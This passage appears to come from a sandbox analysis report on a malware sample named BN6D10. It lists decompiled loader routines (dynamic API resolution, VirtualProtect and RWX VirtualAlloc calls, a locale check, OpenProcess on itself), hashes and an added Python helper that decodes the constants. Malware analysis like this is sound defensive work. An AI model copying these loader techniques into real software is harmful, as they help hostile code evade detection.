                                                                                                                                        					_t36 = _v12;
                                                                                                                                        					 *((intOrPtr*)(_t36 + 0x18))( *((intOrPtr*)(_t36 + 0x1c))( *_t36));
                                                                                                                                        					E00401F77(_t36);
                                                                                                                                        					L8:
                                                                                                                                        					return _t33;
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004013AB: GetModuleHandleA.KERNELBASE(?,?,00000002,?,?,?,?,?,00401C49,?,?,?,00000002,00000000,?,?), ref: 004013D0
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 004013F2
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 00401408
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 0040141E
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 00401434
                                                                                                                                          • Part of subcall function 004013AB: GetProcAddress.KERNELBASE(00000000,?), ref: 0040144A
                                                                                                                                          • Part of subcall function 00401F8C: memcpy.NTDLL(00000000,00000002,?,00000002,?,?,?,?,00401C57,?,?,?,?,?,00000002,00000000), ref: 00401FB9
                                                                                                                                          • Part of subcall function 00401F8C: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 00401FEC
                                                                                                                                          • Part of subcall function 0040200D: LoadLibraryA.KERNELBASE(?,?,00000000,?,?,?,00000002), ref: 0040203F
                                                                                                                                          • Part of subcall function 0040200D: lstrlenA.KERNEL32(?), ref: 00402055
                                                                                                                                          • Part of subcall function 0040200D: memset.NTDLL ref: 0040205F
                                                                                                                                          • Part of subcall function 0040200D: GetProcAddress.KERNEL32(?,00000002), ref: 004020C2
                                                                                                                                          • Part of subcall function 0040200D: lstrlenA.KERNEL32(-00000002), ref: 004020D7
                                                                                                                                          • Part of subcall function 0040200D: memset.NTDLL ref: 004020E1
                                                                                                                                          • Part of subcall function 004016D0: VirtualProtect.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,?,00000002), ref: 004016FE
                                                                                                                                          • Part of subcall function 004016D0: VirtualProtect.KERNEL32(00000000,00000000,00000004,?), ref: 00401755
                                                                                                                                          • Part of subcall function 004016D0: GetLastError.KERNEL32(?,?), ref: 0040175B
                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00401C8B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 33504255-0
                                                                                                                                        • Opcode ID: 9536993cfc3ac6a45bae2a745d533d39a1ddd57a0d372dcbed185059d1b13e45
                                                                                                                                        • Instruction ID: 32e589e3f3fa5c28fc9826b282057990af9ed524917f32dd9ef98362c1f9069b
                                                                                                                                        • Opcode Fuzzy Hash: 9536993cfc3ac6a45bae2a745d533d39a1ddd57a0d372dcbed185059d1b13e45
                                                                                                                                        • Instruction Fuzzy Hash: D3112C37940A016BE7219B79CC45EAB73ACAF44354B05013AF901F3391EB78ED0147A8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.02%

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00F661BE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.705480067.0000000000F65000.00000040.00000001.sdmp, Offset: 00F65000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_f65000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: 473ac6174c505e486f61ee6f00830a8cbace2cd2089b8d0b8ae44f1c4cadc9d8
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: A4113C79A00208EFDB01DF98C985E98BBF5AF08750F0580A4F9489B362D775EA50EF80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E00401676(void* __ecx) {
                                                                                                                                        				char _v8;
                                                                                                                                        				signed short _t7;
                                                                                                                                        
                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                        				_t7 = GetLocaleInfoA("true", 0x5a,  &_v8, 4);
                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                        					__imp__GetSystemDefaultUILanguage();
                                                                                                                                        					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                                                                                                        				}
                                                                                                                                        				return _v8;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,0000005A,00000000,00000004,?,?,00402176,?,00000000,?,?,00000000,?,?,?,0040112E), ref: 0040168B
                                                                                                                                        • GetSystemDefaultUILanguage.KERNEL32(?,?,00402176,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 00401695
                                                                                                                                        • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,00402176,?,00000000,?,?,00000000,?,?,?,0040112E), ref: 004016A8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3724080410-0
                                                                                                                                        • Opcode ID: 7f8bc06977c5fb231e505e3596aed4ef3a2c7d4493f4dcf66c3d5f64dfdeb59b
                                                                                                                                        • Instruction ID: e67426800cb1804ef177786c223d77e39d168568acbb21d6da087c10dd334db1
                                                                                                                                        • Opcode Fuzzy Hash: 7f8bc06977c5fb231e505e3596aed4ef3a2c7d4493f4dcf66c3d5f64dfdeb59b
                                                                                                                                        • Instruction Fuzzy Hash: 39E0B864641205B7E710DB91DD06F7976AC974074AF500055B741F60D0D6789F04AA79
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 6.84%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.705480067.0000000000F65000.00000040.00000001.sdmp, Offset: 00F65000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_f65000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction ID: 70161af733ca9e94b16308ee142ed7a0144659667cbd030581384b4a18330694
                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction Fuzzy Hash: FE11CE72340500AFDB40CF55DC81FA673EAEB88730B298065ED08CB346D67AEC01C7A0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                        			E004019A8(void* __esi) {
                                                                                                                                        				intOrPtr _t9;
                                                                                                                                        				long _t10;
                                                                                                                                        				intOrPtr _t12;
                                                                                                                                        				intOrPtr* _t19;
                                                                                                                                        				intOrPtr* _t20;
                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                        				void* _t22;
                                                                                                                                        				intOrPtr* _t23;
                                                                                                                                        				struct _CRITICAL_SECTION* _t25;
                                                                                                                                        				void* _t26;
                                                                                                                                        
                                                                                                                                        				_t22 = __esi;
                                                                                                                                        				_t25 =  *(_t26 + 0xc);
                                                                                                                                        				_t9 =  *((intOrPtr*)(_t25 + 0x20));
                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                        					__imp__RemoveVectoredExceptionHandler(_t9);
                                                                                                                                        				}
                                                                                                                                        				_t10 =  *(_t25 + 0x24);
                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                        					TlsFree(_t10);
                                                                                                                                        				}
                                                                                                                                        				if( *_t25 != 0) {
                                                                                                                                        					DeleteCriticalSection(_t25);
                                                                                                                                        				}
                                                                                                                                        				_t19 = _t25 + 0x18;
                                                                                                                                        				_t21 =  *_t19;
                                                                                                                                        				if(_t21 != _t19) {
                                                                                                                                        					_push(_t22);
                                                                                                                                        					do {
                                                                                                                                        						_t23 = _t21;
                                                                                                                                        						_t12 =  *_t23;
                                                                                                                                        						_t20 =  *((intOrPtr*)(_t23 + 4));
                                                                                                                                        						_t21 =  *_t21;
                                                                                                                                        						 *_t20 = _t12;
                                                                                                                                        						 *((intOrPtr*)(_t12 + 4)) = _t20;
                                                                                                                                        						_t7 = _t23 + 0xc; // 0xc
                                                                                                                                        						VirtualProtect( *(_t23 + 8) << 0xc, 1,  *_t7, _t7);
                                                                                                                                        						E00401F77(_t23);
                                                                                                                                        					} while (_t21 != _t19);
                                                                                                                                        				}
                                                                                                                                        				return E00401F77(_t25);
                                                                                                                                        			}

                                                                                                                                         Instruction addresses for this function: 0x004019a8 to 0x00401a19 (the disassembly text itself was not captured in this export; the API call sites below are at 0x004019b7, 0x004019c5, 0x004019d2 and 0x004019ff)

                                                                                                                                        APIs
                                                                                                                                        • RemoveVectoredExceptionHandler.KERNEL32(?,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000,?,?,?,0040111D), ref: 004019B7
                                                                                                                                        • TlsFree.KERNEL32(?,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000,?,?,?,0040111D), ref: 004019C5
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000,?,?,?,0040111D), ref: 004019D2
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000001,0000000C,0000000C,00000000,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000), ref: 004019FF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalDeleteExceptionFreeHandlerProtectRemoveSectionVectoredVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2089334682-0
                                                                                                                                        • Opcode ID: e95bd8cd7627fb4772f1c790d46f7e17e2829583be7f5a481fa77397a176779f
                                                                                                                                        • Instruction ID: 9c331b9d05177dc367753e723a0966a416fc2945be1df10d8dc1b2f8949edb71
                                                                                                                                        • Opcode Fuzzy Hash: e95bd8cd7627fb4772f1c790d46f7e17e2829583be7f5a481fa77397a176779f
                                                                                                                                        • Instruction Fuzzy Hash: D5015AB62012059FDB10DF59C988E9BBBEDEF48315B00852AF956E3361C739ED40CB68
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.12%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                         			E00401498() {
                                                                                                                                         				void* _t1;
                                                                                                                                         				long _t3;
                                                                                                                                         				void* _t4;
                                                                                                                                         				long _t5;
                                                                                                                                         				void* _t6;
                                                                                                                                         				intOrPtr _t8;
                                                                                                                                         
                                                                                                                                         				_t8 =  *0x4040f0;
                                                                                                                                         				/* unnamed manual-reset event, initially non-signalled; handle is kept in a global at 0x4040fc */
                                                                                                                                         				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                         				 *0x4040fc = _t1;
                                                                                                                                         				if(_t1 == 0) {
                                                                                                                                         					return GetLastError();
                                                                                                                                         				}
                                                                                                                                         				/* GetVersion() packs the OS version into a DWORD (major version in the low byte);
                                                                                                                                         				   a value of 5 or below is rejected with 0x32 = 50 = ERROR_NOT_SUPPORTED */
                                                                                                                                         				_t3 = GetVersion();
                                                                                                                                         				if(_t3 <= 5) {
                                                                                                                                         					_t4 = 0x32;
                                                                                                                                         					return _t4;
                                                                                                                                         				} else {
                                                                                                                                         					 *0x4040ec = _t3;
                                                                                                                                         					_t5 = GetCurrentProcessId();
                                                                                                                                         					 *0x4040e8 = _t5;
                                                                                                                                         					 *0x4040f0 = _t8;
                                                                                                                                         					/* open a handle to the current process; 0x10047a = SYNCHRONIZE | PROCESS_QUERY_INFORMATION |
                                                                                                                                         					   PROCESS_DUP_HANDLE | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD */
                                                                                                                                         					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                         					 *0x4040e4 = _t6;
                                                                                                                                         					if(_t6 == 0) {
                                                                                                                                         						/* on failure the global becomes -1 (INVALID_HANDLE_VALUE) rather than NULL */
                                                                                                                                         						 *0x4040e4 =  *0x4040e4 | 0xffffffff;
                                                                                                                                         					}
                                                                                                                                         					return 0;
                                                                                                                                         				}
                                                                                                                                         			}
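The two magic numbers in E00401498 (the OpenProcess access mask 0x10047a and the GetVersion() DWORD it gates on) are easier to reason about once decoded. The helper below is an added example written for this page, not code from the sandbox report or from the sample; the flag values are the documented Win32 constants, and the sample version DWORDs (Windows XP SP3 as 5.1.2600, Windows 7 SP1 as 6.1.7601) are constructed inputs.

```python
# Added example (not part of the Joe Sandbox report): decode the constants
# used by E00401498 so the decompiled calls read as named Win32 flags.

# Documented PROCESS_* access rights (winnt.h) plus SYNCHRONIZE.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00100000: "SYNCHRONIZE",
}

ERROR_NOT_SUPPORTED = 0x32  # the value E00401498 returns on the version gate


def decode_process_access(mask: int) -> list:
    """Expand an OpenProcess dwDesiredAccess mask into flag names, lowest bit first.
    Any bit without a known name is appended as a hex literal so nothing is silently dropped."""
    names = [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    if leftover:
        names.append(f"0x{leftover:08x}")
    return names


def decode_getversion(value: int) -> tuple:
    """Split a GetVersion() DWORD: major version in the low byte, minor in the next byte,
    build number in the high word (only meaningful when the top bit is clear, i.e. NT-based)."""
    major = value & 0xFF
    minor = (value >> 8) & 0xFF
    build = (value >> 16) if not (value & 0x80000000) else None
    return major, minor, build


def encode_getversion(major: int, minor: int, build: int) -> int:
    """Inverse of decode_getversion, used here to construct sample inputs."""
    return (build << 16) | (minor << 8) | major


def version_gate(value: int) -> int:
    """The gate as the decompiler renders it: a raw value of 5 or below returns
    ERROR_NOT_SUPPORTED, anything else returns 0 (success)."""
    return ERROR_NOT_SUPPORTED if value <= 5 else 0


if __name__ == "__main__":
    print("0x10047a ->", " | ".join(decode_process_access(0x10047A)))
    for label, v in (("XP SP3", encode_getversion(5, 1, 2600)),
                     ("Win7 SP1", encode_getversion(6, 1, 7601))):
        print(f"{label}: 0x{v:08x} -> {decode_getversion(v)}, gate returns {version_gate(v)}")
```

Note that the decompiler shows the gate comparing the whole DWORD, whereas the major version lives only in the low byte; `decode_getversion` is the reading to use when checking which Windows releases a given value actually represents.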

                                                                                                                                         Instruction addresses for this function: 0x00401499 to 0x004014fe (the disassembly text itself was not captured in this export; the API call sites below are at 0x004014a7, 0x004014b6, 0x004014c5 and 0x004014de)

                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040110A,?,00000000), ref: 004014A7
                                                                                                                                        • GetVersion.KERNEL32(?,00000000), ref: 004014B6
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000), ref: 004014C5
                                                                                                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 004014DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 845504543-0
                                                                                                                                        • Opcode ID: 27347b2bcbe02785c06f53e7a36b259eb5b24c1bed5be72ecca43f3280b5045c
                                                                                                                                        • Instruction ID: 7a34177cdbe4c5a1a16b5891b0a7db50f8ca6654758967224806bdb55014125b
                                                                                                                                        • Opcode Fuzzy Hash: 27347b2bcbe02785c06f53e7a36b259eb5b24c1bed5be72ecca43f3280b5045c
                                                                                                                                        • Instruction Fuzzy Hash: EEF090B1A452019FE710DF69BE09B853FA8B344712F14803AF315F52F4D3B056419B6C
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.16%